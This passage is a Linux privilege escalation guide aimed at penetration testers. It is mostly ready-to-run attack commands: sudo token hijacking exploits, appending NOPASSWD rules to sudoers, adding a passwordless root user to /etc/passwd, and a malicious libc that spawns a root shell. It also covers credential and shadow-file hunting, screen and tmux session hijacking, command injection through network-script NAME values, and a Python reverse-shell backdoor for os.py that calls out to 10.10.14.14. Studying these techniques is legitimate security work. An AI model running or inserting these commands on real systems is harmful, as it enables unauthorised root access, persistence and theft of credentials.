is the same but for cases where you can **only inject arguments** in a command. The project collects legitimate functions of Unix binaries that can be abused to break out restricted shells, escalate or maintain elevated privileges, transfer files, spawn bind and reverse shells, and facilitate the other post-exploitation tasks. > gdb -nx -ex '!sh' -ex quit\ > sudo mysql -e '! /bin/sh'\ > strace -o /dev/null /bin/sh\ > sudo awk 'BEGIN {system("/bin/sh")}' {% embed url="https://gtfobins.github.io/" %} {% embed url="https://gtfoargs.github.io/" %} ### FallOfSudo If you can access `sudo -l` you can use the tool [**FallOfSudo**](https://github.com/CyberOne-Security/FallofSudo) to check if it finds how to exploit any sudo rule. ### Reusing Sudo Tokens In the scenario where **you have a shell as a user with sudo privileges** but you don't know the password of the user, you can **wait for him/her to execute some command using `sudo`**. Then, you can **access the token of the session where sudo was used and use it to execute anything as sudo** (privilege escalation). Requirements to escalate privileges: * You already have a shell as user "_sampleuser_" * "_sampleuser_" have **used `sudo`** to execute something in the **last 15mins** (by default that's the duration of the sudo token that allows us to use `sudo` without introducing any password) * `cat /proc/sys/kernel/yama/ptrace_scope` is 0 * `gdb` is accessible (you can be able to upload it) (You can temporarily enable `ptrace_scope` with `echo 0 | sudo tee /proc/sys/kernel/yama/ptrace_scope` or permanently modifying `/etc/sysctl.d/10-ptrace.conf` and setting `kernel.yama.ptrace_scope = 0`) If all these requirements are met, **you can escalate privileges using:** [**https://github.com/nongiach/sudo\_inject**](https://github.com/nongiach/sudo\_inject) * The **first exploit** (`exploit.sh`) will create the binary `activate_sudo_token` in _/tmp_. You can use it to **activate the sudo token in your session** (you won't get automatically a root shell, do `sudo su`): ```bash bash exploit.sh /tmp/activate_sudo_token sudo su ``` * The **second exploit** (`exploit_v2.sh`) will create a sh shell in _/tmp_ **owned by root with setuid** ```bash bash exploit_v2.sh /tmp/sh -p ``` * The **third exploit** (`exploit_v3.sh`) will **create a sudoers file** that makes **sudo tokens eternal and allows all users to use sudo** ```bash bash exploit_v3.sh sudo su ``` ### /var/run/sudo/ts/\ If you have **write permissions** in the folder or on any of the created files inside the folder you can use the binary [**write\_sudo\_token**](https://github.com/nongiach/sudo\_inject/tree/master/extra\_tools) to **create a sudo token for a user and PID**.\ For example, if you can overwrite the file _/var/run/sudo/ts/sampleuser_ and you have a shell as that user with PID 1234, you can **obtain sudo privileges** without needing to know the password doing: ```bash ./write_sudo_token 1234 > /var/run/sudo/ts/sampleuser ``` ### /etc/sudoers, /etc/sudoers.d The file `/etc/sudoers` and the files inside `/etc/sudoers.d` configure who can use `sudo` and how. These files **by default can only be read by user root and group root**.\ **If** you can **read** this file you could be able to **obtain some interesting information**, and if you can **write** any file you will be able to **escalate privileges**. ```bash ls -l /etc/sudoers /etc/sudoers.d/ ls -ld /etc/sudoers.d/ ``` If you can write you can abuse this permission ```bash echo "$(whoami) ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers echo "$(whoami) ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers.d/README ``` Another way to abuse these permissions: ```bash # makes it so every terminal can sudo echo "Defaults !tty_tickets" > /etc/sudoers.d/win # makes it so sudo never times out echo "Defaults timestamp_timeout=-1" >> /etc/sudoers.d/win ``` ### DOAS There are some alternatives to the `sudo` binary such as `doas` for OpenBSD, remember to check its configuration at `/etc/doas.conf` ``` permit nopass demo as root cmd vim ``` ### Sudo Hijacking If you know that a **user usually connects to a machine and uses `sudo`** to escalate privileges and you got a shell within that user context, you can **create a new sudo executable** that will execute your code as root and then the user's command. Then, **modify the $PATH** of the user context (for example adding the new path in .bash\_profile) so when the user executes sudo, your sudo executable is executed. Note that if the user uses a different shell (not bash) you will need to modify other files to add the new path. For example[ sudo-piggyback](https://github.com/APTy/sudo-piggyback) modifies `~/.bashrc`, `~/.zshrc`, `~/.bash_profile`. You can find another example in [bashdoor.py](https://github.com/n00py/pOSt-eX/blob/master/empire\_modules/bashdoor.py) ## Shared Library ### ld.so The file `/etc/ld.so.conf` indicates **where the loaded configurations files are from**. Typically, this file contains the following path: `include /etc/ld.so.conf.d/*.conf` That means that the configuration files from `/etc/ld.so.conf.d/*.conf` will be read. This configuration files **points to other folders** where **libraries** are going to be **searched** for. For example, the content of `/etc/ld.so.conf.d/libc.conf` is `/usr/local/lib`. **This means that the system will search for libraries inside `/usr/local/lib`**. If for some reason **a user has write permissions** on any of the paths indicated: `/etc/ld.so.conf`, `/etc/ld.so.conf.d/`, any file inside `/etc/ld.so.conf.d/` or any folder within the config file inside `/etc/ld.so.conf.d/*.conf` he may be able to escalate privileges.\ Take a look at **how to exploit this misconfiguration** in the following page: {% content-ref url="ld.so.conf-example.md" %} [ld.so.conf-example.md](ld.so.conf-example.md) {% endcontent-ref %} ### RPATH ``` level15@nebula:/home/flag15$ readelf -d flag15 | egrep "NEEDED|RPATH" 0x00000001 (NEEDED) Shared library: [libc.so.6] 0x0000000f (RPATH) Library rpath: [/var/tmp/flag15] level15@nebula:/home/flag15$ ldd ./flag15 linux-gate.so.1 => (0x0068c000) libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0x00110000) /lib/ld-linux.so.2 (0x005bb000) ``` By copying the lib into `/var/tmp/flag15/` it will be used by the program in this place as specified in the `RPATH` variable. ``` level15@nebula:/home/flag15$ cp /lib/i386-linux-gnu/libc.so.6 /var/tmp/flag15/ level15@nebula:/home/flag15$ ldd ./flag15 linux-gate.so.1 => (0x005b0000) libc.so.6 => /var/tmp/flag15/libc.so.6 (0x00110000) /lib/ld-linux.so.2 (0x00737000) ``` Then create an evil library in `/var/tmp` with `gcc -fPIC -shared -static-libgcc -Wl,--version-script=version,-Bstatic exploit.c -o libc.so.6` ```c #include #define SHELL "/bin/sh" int __libc_start_main(int (*main) (int, char **, char **), int argc, char ** ubp_av, void (*init) (void), void (*fini) (void), void (*rtld_fini) (void), void (* stack_end)) { char *file = SHELL; char *argv[] = {SHELL,0}; setresuid(geteuid(),geteuid(), geteuid()); execve(file,argv,0); } ``` ## Capabilities Linux capabilities provide a **subset of the available root privileges to a process**. This effectively breaks up root **privileges into smaller and distinctive units**. Each of these units can then be independently granted to processes. This way the full set of privileges is reduced, decreasing the risks of exploitation.\ Read the following page to **learn more about capabilities and how to abuse them**: {% content-ref url="linux-capabilities.md" %} [linux-capabilities.md](linux-capabilities.md) {% endcontent-ref %} ## Directory permissions In a directory, the **bit for "execute"** implies that the user affected can "**cd**" into the folder.\ The **"read"** bit implies the user can **list** the **files**, and the **"write"** bit implies the user can **delete** and **create** new **files**. ## ACLs ACLs (Access Control Lists) are the second level of discretionary permissions, that **may override the standard ugo/rwx** ones. When used correctly they can grant you a **better granularity in setting access to a file or a directory**, for example by giving or denying access to a specific user that is neither the file owner nor the group owner (from [**here**](https://linuxconfig.org/how-to-manage-acls-on-linux)).\ **Give** user "kali" read and write permissions over a file: ```bash setfacl -m u:kali:rw file.txt #Set it in /etc/sudoers or /etc/sudoers.d/README (if the dir is included) setfacl -b file.txt #Remove the ACL of the file ``` **Get** files with specific ACLs from the system: ```bash getfacl -t -s -R -p /bin /etc /home /opt /root /sbin /usr /tmp 2>/dev/null ``` ## Open shell sessions In **old versions** you may **hijack** some **shell** session of a different user (**root**).\ In **newest versions** you will be able to **connect** to screen sessions only of **your own user**. However, you could find **interesting information inside the session**. ### screen sessions hijacking **List screen sessions** ```bash screen -ls screen -ls / # Show another user' screen sessions ``` ![](<../../.gitbook/assets/image (130).png>) **Attach to a session** ```bash screen -dr #The -d is to detach whoever is attached to it screen -dr 3350.foo #In the example of the image screen -x [user]/[session id] ``` ## tmux sessions hijacking This was a problem with **old tmux versions**. I wasn't able to hijack a tmux (v2.1) session created by root as a non-privileged user. **List tmux sessions** ```bash tmux ls ps aux | grep tmux #Search for tmux consoles not using default folder for sockets tmux -S /tmp/dev_sess ls #List using that socket, you can start a tmux session in that socket with: tmux -S /tmp/dev_sess ``` ![](<../../.gitbook/assets/image (131).png>) **Attach to a session** ```bash tmux attach -t myname #If you write something in this session it will appears in the other opened one tmux attach -d -t myname #First detach the session from the other console and then access it yourself ls -la /tmp/dev_sess #Check who can access it rw-rw---- 1 root devs 0 Sep 1 06:27 /tmp/dev_sess #In this case root and devs can # If you are root or devs you can access it tmux -S /tmp/dev_sess attach -t 0 #Attach using a non-default tmux socket ``` Check **Valentine box from HTB** for an example. ## SSH ### Debian OpenSSL Predictable PRNG - CVE-2008-0166 All SSL and SSH keys generated on Debian based systems (Ubuntu, Kubuntu, etc) between September 2006 and May 13th, 2008 may be affected by this bug.\ This bug is caused when creating a new ssh key in those OS, as **only 32,768 variations were possible**. This means that all the possibilities can be calculated and **having the ssh public key you can search for the corresponding private key**. You can find the calculated possibilities here: [https://github.com/g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh) ### SSH Interesting configuration values * **PasswordAuthentication:** Specifies whether password authentication is allowed. The default is `no`. * **PubkeyAuthentication:** Specifies whether public key authentication is allowed. The default is `yes`. * **PermitEmptyPasswords**: When password authentication is allowed, it specifies whether the server allows login to accounts with empty password strings. The default is `no`. ### PermitRootLogin Specifies whether root can log in using ssh, default is `no`. Possible values: * `yes`: root can login using password and private key * `without-password` or `prohibit-password`: root can only login with a private key * `forced-commands-only`: Root can login only using private key and if the commands options are specified * `no` : no ### AuthorizedKeysFile Specifies files that contain the public keys that can be used for user authentication. It can contain tokens like `%h`, which will be replaced by the home directory. **You can indicate absolute paths** (starting in `/`) or **relative paths from the user's home**. For example: ```bash AuthorizedKeysFile .ssh/authorized_keys access ``` That configuration will indicate that if you try to login with the **private** key of the user "**testusername**" ssh is going to compare the public key of your key with the ones located in `/home/testusername/.ssh/authorized_keys` and `/home/testusername/access` ### ForwardAgent/AllowAgentForwarding SSH agent forwarding allows you to **use your local SSH keys instead of leaving keys** (without passphrases!) sitting on your server. So, you will be able to **jump** via ssh **to a host** and from there **jump to another** host **using** the **key** located in your **initial host**. You need to set this option in `$HOME/.ssh.config` like this: ``` Host example.com ForwardAgent yes ``` Notice that if `Host` is `*` every time the user jumps to a different machine, that host will be able to access the keys (which is a security issue). The file `/etc/ssh_config` can **override** this **options** and allow or denied this configuration.\ The file `/etc/sshd_config` can **allow** or **denied** ssh-agent forwarding with the keyword `AllowAgentForwarding` (default is allow). If you find that Forward Agent is configured in an environment read the following page as **you may be able to abuse it to escalate privileges**: {% content-ref url="ssh-forward-agent-exploitation.md" %} [ssh-forward-agent-exploitation.md](ssh-forward-agent-exploitation.md) {% endcontent-ref %} ## Interesting Files ### Profiles files The file `/etc/profile` and the files under `/etc/profile.d/` are **scripts that are executed when a user runs a new shell**. Therefore, if you can **write or modify any of them you can escalate privileges**. ```bash ls -l /etc/profile /etc/profile.d/ ``` If any weird profile script is found you should check it for **sensitive details**. ### Passwd/Shadow Files Depending on the OS the `/etc/passwd` and `/etc/shadow` files may be using a different name or there may be a backup. Therefore it's recommended **find all of them** and **check if you can read** them to see **if there are hashes** inside the files: ```bash #Passwd equivalent files cat /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null #Shadow equivalent files cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db /etc/security/opasswd 2>/dev/null ``` In some occasions you can find **password hashes** inside the `/etc/passwd` (or equivalent) file ```bash grep -v '^[^:]*:[x\*]' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null ``` ### Writable /etc/passwd First, generate a password with one of the following commands. ``` openssl passwd -1 -salt hacker hacker mkpasswd -m SHA-512 hacker python2 -c 'import crypt; print crypt.crypt("hacker", "$6$salt")' ``` Then add the user `hacker` and add the generated password. ``` hacker:GENERATED_PASSWORD_HERE:0:0:Hacker:/root:/bin/bash ``` E.g: `hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash` You can now use the `su` command with `hacker:hacker` Alternatively, you can use the following lines to add a dummy user without a password.\ WARNING: you might degrade the current security of the machine. ``` echo 'dummy::0:0::/root:/bin/bash' >>/etc/passwd su - dummy ``` NOTE: In BSD platforms `/etc/passwd` is located at `/etc/pwd.db` and `/etc/master.passwd`, also the `/etc/shadow` is renamed to `/etc/spwd.db`. You should check if you can **write in some sensitive files**. For example, can you write to some **service configuration file**? ```bash find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' 2>/dev/null | grep -v '/proc/' | grep -v $HOME | sort | uniq #Find files owned by the user or writable by anybody for g in `groups`; do find \( -type f -or -type d \) -group $g -perm -g=w 2>/dev/null | grep -v '/proc/' | grep -v $HOME; done #Find files writable by any group of the user ``` For example, if the machine is running a **tomcat** server and you can **modify the Tomcat service configuration file inside /etc/systemd/,** then you can modify the lines: ``` ExecStart=/path/to/backdoor User=root Group=root ``` Your backdoor will be executed the next time that tomcat is started. ### Check Folders The following folders may contain backups or interesting information: **/tmp**, **/var/tmp**, **/var/backups, /var/mail, /var/spool/mail, /etc/exports, /root** (Probably you won't be able to read the last one but try) ```bash ls -a /tmp /var/tmp /var/backups /var/mail/ /var/spool/mail/ /root ``` ### Weird Location/Owned files ```bash #root owned files in /home folders find /home -user root 2>/dev/null #Files owned by other users in folders owned by me for d in `find /var /etc /home /root /tmp /usr /opt /boot /sys -type d -user $(whoami) 2>/dev/null`; do find $d ! -user `whoami` -exec ls -l {} \; 2>/dev/null; done #Files owned by root, readable by me but not world readable find / -type f -user root ! -perm -o=r 2>/dev/null #Files owned by me or world writable find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null #Writable files by each group I belong to for g in `groups`; do printf " Group $g:\n"; find / '(' -type f -or -type d ')' -group $g -perm -g=w ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null done done ``` ### Modified files in last mins ```bash find / -type f -mmin -5 ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" ! -path "/dev/*" ! -path "/var/lib/*" 2>/dev/null ``` ### Sqlite DB files ```bash find / -name '*.db' -o -name '*.sqlite' -o -name '*.sqlite3' 2>/dev/null ``` ### \*\_history, .sudo\_as\_admin\_successful, profile, bashrc, httpd.conf, .plan, .htpasswd, .git-credentials, .rhosts, hosts.equiv, Dockerfile, docker-compose.yml files ```bash find / -type f \( -name "*_history" -o -name ".sudo_as_admin_successful" -o -name ".profile" -o -name "*bashrc" -o -name "httpd.conf" -o -name "*.plan" -o -name ".htpasswd" -o -name ".git-credentials" -o -name "*.rhosts" -o -name "hosts.equiv" -o -name "Dockerfile" -o -name "docker-compose.yml" \) 2>/dev/null ``` ### Hidden files ```bash find / -type f -iname ".*" -ls 2>/dev/null ``` ### **Script/Binaries in PATH** ```bash for d in `echo $PATH | tr ":" "\n"`; do find $d -name "*.sh" 2>/dev/null; done for d in `echo $PATH | tr ":" "\n"`; do find $d -type -f -executable 2>/dev/null; done ``` ### **Web files** ```bash ls -alhR /var/www/ 2>/dev/null ls -alhR /srv/www/htdocs/ 2>/dev/null ls -alhR /usr/local/www/apache22/data/ ls -alhR /opt/lampp/htdocs/ 2>/dev/null ``` ### **Backups** ```bash find /var /etc /bin /sbin /home /usr/local/bin /usr/local/sbin /usr/bin /usr/games /usr/sbin /root /tmp -type f \( -name "*backup*" -o -name "*\.bak" -o -name "*\.bck" -o -name "*\.bk" \) 2>/dev/null ``` ### Known files containing passwords Read the code of [**linPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS), it searches for **several possible files that could contain passwords**.\ **Another interesting tool** that you can use to do so is: [**LaZagne**](https://github.com/AlessandroZ/LaZagne) which is an open source application used to retrieve lots of passwords stored on a local computer for Windows, Linux & Mac. ### Logs If you can read logs, you may be able to find **interesting/confidential information inside them**. The more strange the log is, the more interesting it will be (probably).\ Also, some "**bad**" configured (backdoored?) **audit logs** may allow you to **record passwords** inside audit logs as explained in this post: [https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/](https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/). ```bash aureport --tty | grep -E "su |sudo " | sed -E "s,su|sudo,${C}[1;31m&${C}[0m,g" grep -RE 'comm="su"|comm="sudo"' /var/log* 2>/dev/null ``` In order to **read logs the group** [**adm**](interesting-groups-linux-pe/#adm-group) will be really helpful. ### Shell files ```bash ~/.bash_profile # if it exists, read it once when you log in to the shell ~/.bash_login # if it exists, read it once if .bash_profile doesn't exist ~/.profile # if it exists, read once if the two above don't exist /etc/profile # only read if none of the above exists ~/.bashrc # if it exists, read it every time you start a new shell ~/.bash_logout # if it exists, read when the login shell exits ~/.zlogin #zsh shell ~/.zshrc #zsh shell ``` ### Generic Creds Search/Regex You should also check for files containing the word "**password**" in its **name** or inside the **content**, and also check for IPs and emails inside logs, or hashes regexps.\ I'm not going to list here how to do all of this but if you are interested you can check the last checks that [**linpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh) perform. ## Writable files ### Python library hijacking If you know from **where** a python script is going to be executed and you **can write inside** that folder or you can **modify python libraries**, you can modify the OS library and backdoor it (if you can write where python script is going to be executed, copy and paste the os.py library). To **backdoor the library** just add at the end of the os.py library the following line (change IP and PORT): ```python import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.14",5678));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]); ``` ### Logrotate exploitation There is a vulnerability on `logrotate` that allows a user with **write permissions over a log file** or **any** of its **parent directories** to make `logrotate` write **a file in any location**. If **logrotate** is being executed by **root**, then the user will be able to write any file in _**/etc/bash\_completion.d/**_ that will be executed by any user that login.\ So, if you have **write perms** over a **log file** **or** any of its **parent folder**, you can **privesc** (on most linux distributions, logrotate is executed automatically once a day as **user root**). Also, check if apart from _/var/log_ are more files being **rotated**. {% hint style="info" %} This vulnerability affects `logrotate` version `3.18.0` and older {% endhint %} More detailed information about the vulnerability can be found on this page: [https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition](https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition). You can exploit this vulnerability with [**logrotten**](https://github.com/whotwagner/logrotten). This vulnerability is very similar to [**CVE-2016-1247**](https://www.cvedetails.com/cve/CVE-2016-1247/) **(nginx logs),** so whenever you find that you can alter logs, check who is managing those logs and check if you can escalate privileges substituting the logs by symlinks. ### /etc/sysconfig/network-scripts/ (Centos/Redhat) If, for whatever reason, a user is able to **write** an `ifcf-` script to _/etc/sysconfig/network-scripts_ **or** it can **adjust** an existing one, then your **system is pwned**. Network scripts, _ifcg-eth0_ for example are used for network connections. They look exactly like .INI files. However, they are \~sourced\~ on Linux by Network Manager (dispatcher.d). In my case, the `NAME=` attributed in these network scripts is not handled correctly. If you have **white/blank space in the name the system tries to execute the part after the white/blank space**. This means that **everything after the first blank space is executed as root**. For example: _/etc/sysconfig/network-scripts/ifcfg-1337_ ```bash NAME=Network /bin/id ONBOOT=yes DEVICE=eth0 ``` (_Note the blank space between Network and /bin/id_) **Vulnerability reference:** [**https://vulmon.com/exploitdetails?qidtp=maillist\_fulldisclosure\&qid=e026a0c5f83df4fd532442e1324ffa4f**](https://vulmon.com/exploitdetails?qidtp=maillist\_fulldisclosure\&qid=e026a0c5f83df4fd532442e1324ffa4f) ### **init, init.d, systemd, and rc.d** `/etc/init.d` contains **scripts** used by the System V init tools (SysVinit). This is the **traditional service management package for Linux**, containing the `init` program (the first process that is run when the kernel has finished initializing¹) as well as some infrastructure to start and stop services and configure them. Specifically, files in `/etc/init.d` are shell scripts that respond to `start`, `stop`, `restart`, and (when supported) `reload` commands to manage a particular service. These scripts can be invoked directly or (most commonly) via some other trigger (typically the presence of a symbolic link in `/etc/rc?.d/`). (From [here](https://askubuntu.com/questions/5039/what-is-the-difference-between-etc-init-and-etc-init-d)). Other alternative to this folder is `/etc/rc.d/init.d` in Redhat. `/etc/init` contains **configuration** files used by **Upstart**. Upstart is a young **service management package** championed by Ubuntu. Files in `/etc/init` are configuration files telling Upstart how and when to `start`, `stop`, `reload` the configuration, or query the `status` of a service. As of lucid, Ubuntu is transitioning from SysVinit to Upstart, which explains why many services come with SysVinit scripts even though Upstart configuration files are preferred. The SysVinit scripts are processed by a compatibility layer in Upstart. (From [here](https://askubuntu.com/questions/5039/what-is-the-difference-between-etc-init-and-etc-init-d)). **systemd** is a **Linux initialization system and service manager that includes features like on-demand starting of daemons**, mount and automount point maintenance, snapshot support, and processes tracking using Linux control groups. systemd provides a logging daemon and other tools and utilities to help with common system administration tasks. (From [here](https://www.linode.com/docs/quick-answers/linux-essentials/what-is-systemd/)). Files that ship in packages downloaded from the distribution repository go into `/usr/lib/systemd/`. Modifications done by system administrator (user) go into `/etc/systemd/system/`. ## Other Tricks ### NFS Privilege escalation {% content-ref url="nfs-no_root_squash-misconfiguration-pe.md" %} [nfs-no\_root\_squash-misconfiguration-pe.md](nfs-no\_root\_squash-misconfiguration-pe.md) {% endcontent-ref %} ### Escaping from restricted Shells {% content-ref url="escaping-from-limited-bash.md" %} [escaping-from-limited-bash.md](escaping-from-limited-bash.md) {% endcontent-ref %} ### Cisco - vmanage {% content-ref url="cisco-vmanage.md" %} [cisco-vmanage.md](cisco-vmanage.md) {% endcontent-ref %} ## Kernel Security Protections * [https://github.com/a13xp0p0v/kconfig-hardened-check](https://github.com/a13xp0p0v/kconfig-hardened-check) * [https://github.com/a13xp0p0v/linux-kernel-defence-map](https://github.com/a13xp0p0v/linux-kernel-defence-map) ## More help [Static impacket binaries](https://github.com/ropnop/impacket\_static\_binaries) ## Linux/Unix Privesc Tools ### **Best tool to look for Linux local privilege escalation vectors:** [**LinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS) **LinEnum**: [https://github.com/rebootuser/LinEnum](https://github.com/rebootuser/LinEnum)(-t option)\ **Enumy**: [https://github.com/luke-goddard/enumy](https://github.com/luke-goddard/enumy)\ **Unix Privesc Check:** [http://pentestmonkey.net/tools/audit/unix-privesc-check](http://pentestmonkey.net/tools/audit/unix-privesc-check)\ **Linux Priv Checker:** [www.securitysift.com/download/linuxprivchecker.py](http://www.securitysift.com/download/linuxprivchecker.py)\ **BeeRoot:** [https://github.com/AlessandroZ/BeRoot/tree/master/Linux](https://github.com/AlessandroZ/BeRoot/tree/master/Linux)\ **Kernelpop:** Enumerate kernel vulns ins linux and MAC [https://github.com/spencerdodd/kernelpop](https://github.com/spencerdodd/kernelpop)\ **Mestaploit:** _**multi/recon/local\_exploit\_suggester**_\ **Linux Exploit Suggester:** [https://github.com/mzet-/linux-exploit-suggester](https://github.com/mzet-/linux-exploit-suggester)\ **EvilAbigail (physical access):** [https://github.com/GDSSecurity/EvilAbigail](https://github.com/GDSSecurity/EvilAbigail)\ **Recopilation of more scripts**: [https://github.com/1N3/PrivEsc](https://github.com/1N3/PrivEsc) ## References [https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)\ [https://payatu.com/guide-linux-privilege-escalation/](https://payatu.com/guide-linux-privilege-escalation/)\ [https://pen-testing.sans.org/resources/papers/gcih/attack-defend-linux-privilege-escalation-techniques-2016-152744](https://pen-testing.sans.org/resources/papers/gcih/attack-defend-linux-privilege-escalation-techniques-2016-152744)\ [http://0x90909090.blogspot.com/2015/07/no-one-expect-command-execution.html](http://0x90909090.blogspot.com/2015/07/no-one-expect-command-execution.html)\ [https://touhidshaikh.com/blog/?p=827](https://touhidshaikh.com/blog/?p=827)\ [https://github.com/sagishahar/lpeworkshop/blob/master/Lab%20Exercises%20Walkthrough%20-%20Linux.pdf](https://github.com/sagishahar/lpeworkshop/blob/master/Lab%20Exercises%20Walkthrough%20-%20Linux.pdf)\ [https://github.com/frizb/Linux-Privilege-Escalation](https://github.com/frizb/Linux-Privilege-Escalation)\ [https://github.com/lucyoa/kernel-exploits](https://github.com/lucyoa/kernel-exploits)\ [https://github.com/rtcrowley/linux-private-i](https://github.com/rtcrowley/linux-private-i)
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